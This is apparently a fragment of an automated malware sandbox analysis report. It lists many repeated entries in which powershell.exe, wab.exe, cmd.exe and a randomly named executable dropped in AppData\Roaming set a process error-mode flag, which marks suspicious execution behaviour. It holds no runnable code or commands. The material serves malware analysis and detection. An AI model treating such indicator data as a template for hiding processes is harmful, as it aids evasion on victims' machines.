Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
